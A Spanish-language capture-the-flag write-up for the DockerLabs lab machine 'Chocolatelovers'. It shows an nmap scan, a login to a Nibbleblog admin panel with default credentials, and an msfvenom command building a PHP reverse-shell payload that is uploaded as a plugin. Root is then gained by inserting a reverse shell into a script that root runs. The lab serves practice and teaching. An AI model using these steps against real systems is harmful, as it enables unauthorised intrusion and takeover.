romabri@home:~$

Chocolatelovers - DockerLabs

Video de YouTube

OS Dificultad Creator
Linux Fácil ElPinguinoDeMario

Escaneo y Reconocimiento de puertos

Vamos a iniciar nuestro reconocimiento con un rápido escaneo de nmap.

image

nmap -p- --open -sS -sC -sV --min-rate=5000 -vvv -n -Pn -oN escaneo 172.17.0.2

  • -p- - Busqueda de puertos abiertos
  • --open - Enumera los puertos abiertos
  • -sS - Es un modo de escaneo rapido
  • -sC- - Que use un conjunto de scripts de reconocimiento
  • -sV - Que encuentre la version del servicio abirto
  • --min-rate=5000 - Hace que el reconocimiento aun vaya mas rapido mandando no menos de 5000 paquetes
  • -n - No hace resolución DNS
  • -Pn - No hace ping
  • -vvv - Muestra en pantalla a medida que encuentra puertos (Verbose)

Vemos que esta abierto el puerto 80 HTTP

Web

image

Vamos a mirar en el codigo fuente.

image

Esto es posiblemente una ruta de la web vamos a ver que hay

image

Tenemos un enlaze que nos lleva al admin.php nos encontramos con un panel de acceso

image

Si ponemos admin admin accedemos

image

Si vamos a Plugins hemos de instalar el plugin My image, y ahi haremos lo siguiente:

image

Generaremos un payload con msfvenom para generar una reverse shell en un archivo php de la siguiente manera

msfvenom -p php/reverse_php LHOST=172.17.0.1 LPORT=443 -f raw > pwned.php

Este archivo lo subiremos dandole a browse y save changes.

Una vez hecho esto si investigamos un poco por la web vemos que en este repositorio estan los plugins http://172.17.0.2/nibbleblog/content/private/plugins/

image

El archivo malicioso se nos ha subido es el image.php.

Ahora vamos con net cat a quedarnos en escucha y veremos si nos manda una reverse shell.

Intrusión

image

Ya estamos dentro de la maquina Si hacemos sudo -l vemos que como el usuario chocolate podemos ejecutar el php vamos a buscar como escalar con PHP

image

Escalada de privilegios

image

Ya hemos escalado Si hacemos un ps -e -f Vemos un script que lo ejecuta root que no hay nada dentro vamos a intentar escalar a traves de ahí.

image

Modificamos el script introduciendo una reverse-shell.php de las webshells la ip la ponemos a nuestra maquina atacantes y el puerto por ejemplo ponemos el 1122 y si esperemos un momento…

image

YA SOMOS ROOT!